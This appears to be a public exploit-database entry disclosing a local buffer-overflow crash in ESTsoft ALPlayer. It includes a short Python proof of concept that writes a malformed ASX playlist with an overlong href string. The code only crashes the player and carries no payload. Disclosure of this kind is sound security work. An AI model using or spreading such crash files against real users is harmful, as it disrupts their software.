ESTsoft ALPlayer .ASX Playlist crash PoC

2016.09.26

zaeek (PL)

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: ESTsoft ALPlayer ASX Playlist Buffer Overflow PoC
# Date: 26/09/2016
# Exploit Author: zaeek@protonmail.com
# Vendor Homepage: http://www.estsoft.com/
# Version: 10.10.29.0
# Tested on: Windows 7 32/64bit

====Description====

ESTsoft ALPlayer doesn't properly handle malformed ASX files, causing application crash.
Not tested for code execution, just a quick write-up.

====Proof-of-Concept====

# Simple ESTsoft ALPlayer Buffer Overflow crash PoC
# ----
# 1. Generate poc.asx
# 2. In ALPlayer > Open Files > Choose poc.asx or drag'n drop the file directly into main window
# by zaeek
# Thanks to Viotto.

start = '<ASX Version = "3.0" >'
start += '\n<Entry>'
start += '\n<Title>poc</Title>'
start += '\n<Ref href ="' + 'A'*260 + '" />'
start += '\n</Entry>'
start += '\n</ASX>'
f = open("poc.asx","w")
f.write(start)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ESTsoft ALPlayer .ASX Playlist crash PoC

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.